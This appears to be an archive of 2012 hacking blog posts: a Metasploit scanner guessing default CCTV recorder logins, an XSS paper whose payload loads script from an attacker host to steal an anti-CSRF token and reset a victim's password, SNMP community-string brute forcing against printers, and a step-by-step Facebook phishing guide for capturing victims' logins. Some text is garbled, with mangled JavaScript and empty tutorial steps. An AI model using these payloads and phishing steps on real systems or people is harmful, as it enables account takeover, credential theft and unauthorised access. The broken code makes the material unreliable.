Wednesday, 30 May 2012

Hacking CCTV Security Video Surveillance Systems with Metasploit

A new module for the Metasploit Framework, cctv_dvr_login, discovers and tests the security of standalone CCTV (Closed Circuit Television) video surveillance systems. Such systems are frequently deployed in retail stores, living communities, personal residences, and business environments as part of their physical security program. However, many of these systems are vulnerable to exploitation that can allow attackers remote access. Such remote access, enabled by default, can allow not only the ability to view real-time video, but control of the cameras (if supported), and provide access to archived footage.

Most owners of CCTV video surveillance systems may not even be fully aware of the device's remote access capabilities as monitoring may be conducted exclusively via the local video console. This further increases the likelihood of attackers gaining/persisting remote access, with no indication to the owner that their video surveillance system and archived footage may be accessed remotely.

Here at Gotham Digital Science, we often encounter video surveillance systems during penetration testing engagements – some of which may be exposed to the Internet, either intentionally or by accident. With any video surveillance system it is often interesting (and sometimes very important) to find out exactly what cameras are monitoring/recording within the environment. Furthermore, access to such systems can often be utilized to support physical security testing initiatives.

This module targets standalone CCTV video surveillance systems by MicroDigital, HIVISION, CTRing, and a substantial number of other rebranded devices.

msf > use auxiliary/scanner/misc/cctv_dvr_loginmsf auxiliary(cctv_dvr_login) > set RHOSTS => auxiliary(cctv_dvr_login) > exploit

[*] CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] CCTV_DVR - [002/133] - Invalid user: 'user'
[*] CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] CCTV_DVR - [004/133] - Trying username:'admin' with       password:'1111'
[+] Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface ( v1,1,3,1):
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


CCTV DVR Login Scanning Utility

Sunday, 20 May 2012

Best browser for hackers with built in features for hackers- OWASP Mantra Browser Security Framework for penetration testers

Mantra Browser is a most Recomended Browser for hackers and penetration includes security framework which can be very useful to scan various web servers or websites for different attacks like sql injection and XSS attacks.

OWASP Mantra is such an innovative product, a security framework built on top of a browser. Its cross platform, portable and can run out of the box.You can take it with you where ever you go in absolutely any rewritable media including memory cards, flash drives and portable hard disks. More over, Mantra Browser can be used for both offensive security and defensive security related tasks which makes it incredible.
Mantra browser Developed on the firefox which is open source software by mozilla with a security framework.Developers Of mantra security toolkit Also Providing various Tools or addons which can be installed directly in the mantra browser.These Tools can help hackers or penetration testers to undego some work.
Mantra Browser Is Available For different Platforms -windows,linux32,linux64,macintosh.

Tools or Addons Available For Mantra Browser
 OWASP Mantra is a powerful set of tools to make the attacker's task easier. The beta version of Mantra Security Toolkit contains following tools built onto it. Moreover Mantra follows the guidelines and structure of FireCAT which makes it even more accessible. You can also always suggest any tools/ scripts that you would like see in the next release

1. Information Gathering Tools
3.Network Utilities
4.Application Auditing

 For More Information :

Saturday, 19 May 2012

SQL Injection Attack using Havij tool (web hacking)

SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.
SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.

In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

1.JSky software
2.Havij software  

Step 1-->  find out the SQLi vulnerability into the website using JSky software 

step 2--> 

step 3-->

 step 4-->

step 5--> 


game is over  

Monday, 7 May 2012

Token Hijacking with XSS

Firstly thanks for everyone who read this paper. I choose "Token Hijacking with XSS" as a title of this paper and i will try to describe how can we exploit web applications which secured with anti-csrf tokens. 
After preparing of PoC and paper i show some discovered worms and this worms exploits social platforms like Facebook, Twitter etc.. (no i am not author of this worms :> ). I can say that this worms use same idea. For example, when you reverse the latest Facebook worm you can see its hijack session token of user with javascript tricks (its tricks so like return-oriented programming because its use some of facebook's js libraries.. :> ) and use hijacked session token for liking groups, update status and give permissions for application. So i can give a reference to Facebook and Twitter worms as a real world example. 
As i mentioned we do all of these stages with Cross-site Request Forgery attack, but hijacking code in javascript is important part of out attack. As is known somebody release XSS vulnerabilities but if you think XSS is only "alert('XSS')", i can say you fail. Why? Becase any weakness should not be underestimated. Do you remember Apache was hacked with JIRA’s XSS vulnerability? 
Sometimes if application don't store any usefull data on client-side, a founded XSS vulnerability can be useless. But it can be using for force application to CSRF.
 For this paper, i coded a simple vulnerable application. (It's so simple!!) This application have 3 files. File named "xssable.php" have XSS vulnerability. Another file named "form.php" give a form to user for password change and this file creates session token and send it to "passwd.php" with credential. Last file named "passwd.php" checks sended credential and session token. Here is the source codes of each file.

$user = stripslashes($_GET["user"]); 
echo "Hello dear $user"; 

$token = md5(microtime().rand(1337, 31337));
$_SESSION["anti-csrf-token"] = $token;
$username = "admin";
$password = "123456";
 <form id="change_password" action="passwd.php" method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>">
Username: <input type="text" name="uname" value="<?php echo $username; ?>"><br>
Password: <input type="password" name="pwd" value="<?php echo $password; ?>"><br>
<input type="submit" name="change" value="Change"> </form>



$token = $_SESSION["anti-csrf-token"];
$form_token = $_POST["token"];
if ($token == $form_token) {
echo "Your password changed..<br>";
} else {
echo "CSRF Attack Detected!!!";


Now i exploit classic XSS vulnerability, execute my "evil.js" and force user to change his password. Our payload is like this; 
http://VICTIM/xssable.php?user=<script src=http://ATTACKER/evil.js ></script> 

As you see, evil.js  request to form.php with XMLHTTPRequest (blue backgrounded section in evil.js's source code) and hijack session token with regular expression (light green backgrounded section in evil.js's source code). 

Lastly, as you see in The passwd.php with valid session token. 

Source code of evil.js below;

/* evil javascript file.. */
 function get_src(){
if (window.XMLHttpRequest) {
ajax = new XMLHttpRequest();
} else {
ajax = new ActivexObject("Microsoft.XMLHTTP");
ajax.onreadystatechange = function () { get_token(ajax);}"GET", "form.php", true);
function get_token(a) {
if (a.readyState == 4 && a.status == 200){
var src = a.responseText;
p = /value="([0-9a-f]+)"/;
var token = src.match(p);
params = "token=" + token[1] + "&uname=OWNED&pwd=PWNED";
 function attack(parameters) {
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
 } else {
http_request = new ActivexObject("Microsoft.XMLHTTP");

http_request.onreadystatechange = function () {
if (http_request.readyState == 4 && http_request.status == 200) {
 alert("YOU GOT PWNED!!!!\n\n" + http_request.responseText);
}'POST', "passwd.php", true);
 http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");


I finish this paper with a nice quote from CGI Security's well-known article XSS FAQ; "Never trust user input".

DEMO of Token Hijacking with XSS


SNMP and Printer Hacking

I've recently been doing some research in SNMP which lead me to printer hacking. so I'll do a few posts about SNMP stuff and how a large number of printers seem to be on the net with default settings. I guess I'm trying to work out how a big a threat it is to have people see and maybe change some TCP/IP settings on a printer. So far about the worst I have heard about or seen is storing files on the vuln printer, not the end of the world, not the best thing to have going on on your network but not a shell either.

on the with the snmp enumeration...

SegFault:~ cg$ nmap -A n.y.o.b
Starting Nmap 4.20 ( ) at 2007-05-21 19:50 MST
Interesting ports on
Not shown: 1686 closed ports
PORT         STATE   SERVICE               VERSION
23/tcp        open        telnet                       RICOH maintenance telnetd
80/tcp        open       http                           Ricoh Afficio printer web image monitor (Web-Server httpd 3.0)
135/tcp       filtered    msrpc
137/tcp       filtered   netbios-ns
138/tcp       filtered   netbios-dgm
139/tcp       filtered   netbios-ssn
445/tcp       filtered   microsoft-ds
514/tcp       open      login Aficio/NRG printer logind
515/tcp       open      printer lpd (error: Illegal service request)
631/tcp       open      ipp NRG copier or  Ricoh Afficio (Embedded Web-Server 3.0)
9100/tcp  open j       etdirect?
Service Info: Device: printer

SegFault:~ cg$ sudo nmap -sU n.y.o.b

Starting Nmap 4.20 ( ) at 2007-05-21 19:24 MST

All 1488 scanned ports on (n.y.o.b) are open|filtered

Nmap finished: 1 IP address (1 host up) scanned in 145.466 seconds

normal open ports are 21,23,25 (yeah spam relay), 80, 515, 631, 9100

nmap hasnt been giving me good results for UDP scans, there are some other tools to try out i just havent gotten around to it.

SegFault:~/Desktop/cisco-audit/ADMsnmp cg$ ./ADMsnmp
ADMsnmp v 0.1 (c) The ADM crew
./ADMsnmp: [-g,-wordf,-out , [-waitf,-sleep, -manysend,-inter <#>] ]
: host to scan
[-guessname] : guess password with hostname
[-wordfile] : wordlist of password to try
[-outputfile] : output file
[-waitfor] : time in milisecond in each send of snmprequest
[-sleep] : time in second of the scan process life
[-manysend] : how many paket to send by request
[-inter] : time to wait in milisecond after each request

ADMsnmp is a good tool for bruteforcing community names on SNMP enabled boxes.

SegFault:~/Desktop/cisco-audit/ADMsnmp cg$ ./ADMsnmp n.y.o.b -w snmp.passwd
ADMsnmp vbeta 0.1 (c) The ADM crew
greets: !ADM,, ansia
>>>>>>>>>>> get req name=1234 id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=2read id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=4changes id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=CISCO id = 11 >>>>>>>>>>>
>>>>>>>>>>> get req name=IBM id = 14 >>>>>>>>>>>
>>>>>>>>>>> get req name=OrigEquipMfr id = 17 >>>>>>>>>>>
>>>>>>>>>>> get req name=SNMP id = 20 >>>>>>>>>>>
>>>>>>>>>>> get req name=SUN id = 23 >>>>>>>>>>>
>>>>>>>>>>> get req name=access id = 26 >>>>>>>>>>>
>>>>>>>>>>> get req name=admin id = 29 >>>>>>>>>>>
>>>>>>>>>>> get req name=agent id = 32 >>>>>>>>>>>
>>>>>>>>>>> get req name=all id = 35 >>>>>>>>>>>
>>>>>>>>>>> get req name=cisco id = 38 >>>>>>>>>>>
>>>>>>>>>>> get req name=community id = 41 >>>>>>>>>>>
>>>>>>>>>>> get req name=default id = 44 >>>>>>>>>>>
>>>>>>>>>>> get req name=enable id = 47 >>>>>>>>>>>
>>>>>>>>>>> get req name=field id = 50 >>>>>>>>>>>
>>>>>>>>>>> get req name=guest id = 53 >>>>>>>>>>>
>>>>>>>>>>> get req name=hello id = 56 >>>>>>>>>>>
>>>>>>>>>>> get req name=ibm id = 59 >>>>>>>>>>>
>>>>>>>>>>> get req name=manager id = 62 >>>>>>>>>>>
>>>>>>>>>>> get req name=mngt id = 65 >>>>>>>>>>>
>>>>>>>>>>> get req name=monitor id = 68 >>>>>>>>>>>
>>>>>>>>>>> get req name=netman id = 71 >>>>>>>>>>>
>>>>>>>>>>> get req name=network id = 74 >>>>>>>>>>>
>>>>>>>>>>> get req name=none id = 77 >>>>>>>>>>>
>>>>>>>>>>> get req name=openview id = 80 >>>>>>>>>>>
>>>>>>>>>>> get req name=pass id = 83 >>>>>>>>>>>
>>>>>>>>>>> get req name=password id = 86 >>>>>>>>>>>
>>>>>>>>>>> get req name=private id = 89 >>>>>>>>>>>
>>>>>>>>>>> get req name=proxy id = 92 >>>>>>>>>>>
>>>>>>>>>>> get req name=public id = 95 >>>>>>>>>>>
<<<<<<<<<<< id =" 96" name =" public" ret ="0">
>>>>>>>>>>>> send setrequest id = 96 name = public >>>>>>>>
>>>>>>>>>>> get req name=read id = 98 >>>>>>>>>>>
<<<<<<<<<<< id =" 97" name =" public" ret ="0">
>>>>>>>>>>> get req name=read-only id = 101 >>>>>>>>>>>
>>>>>>>>>>> get req name=read-write id = 104 >>>>>>>>>>>
>>>>>>>>>>> get req name=root id = 107 >>>>>>>>>>>
>>>>>>>>>>> get req name=router id = 110 >>>>>>>>>>>
>>>>>>>>>>> get req name=secret id = 113 >>>>>>>>>>>
>>>>>>>>>>> get req name=security id = 116 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmp id = 119 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmpd id = 122 >>>>>>>>>>>
>>>>>>>>>>> get req name=solaris id = 125 >>>>>>>>>>>
>>>>>>>>>>> get req name=sun id = 128 >>>>>>>>>>>
>>>>>>>>>>> get req name=switch id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=system id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=tech id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=test id = 11 >>>>>>>>>>>
>>>>>>>>>>> get req name=world id = 14 >>>>>>>>>>>
>>>>>>>>>>> get req name=write id = 17 >>>>>>>>>>>

snmp check on n.y.o.b
sys.sysName.0:Aficio 2022
name = public readonly access

This one had changed the write community string but let see what we can get for free.

SegFault:~/Desktop/cisco-audit/snmpenum cg$ perl n.y.o.b public linux.txt


Aficio 2022








28 days, 08:06:40.00


RICOH Aficio 2022 1.04 / RICOH Network Printer C model / RICOH Network Scanner C model / RICOH Network Facsimile C model



How to Hack Facebook Account (Phishing)

       First of all download the Facebook Phishing Page.  Extract the zip file now you will get two files as given below:
  • code.php
  • index.php
       Upload all the tow files to any of the free Web hosting server. Some Free Web hosting servers are given below you can also find few more for yourself. 

       Once you have uploaded all the two files to web hosting server now you have to send the link of index.php file to your victim.
       Now After sending Phisher to victim, then victim get the fake page of facebook once the user logs in to his Facebook account using your Phisher, his user ID and password are ours...And these are stored in logs.txt what you have to do is just refresh your Web hosting account files.

Game is Over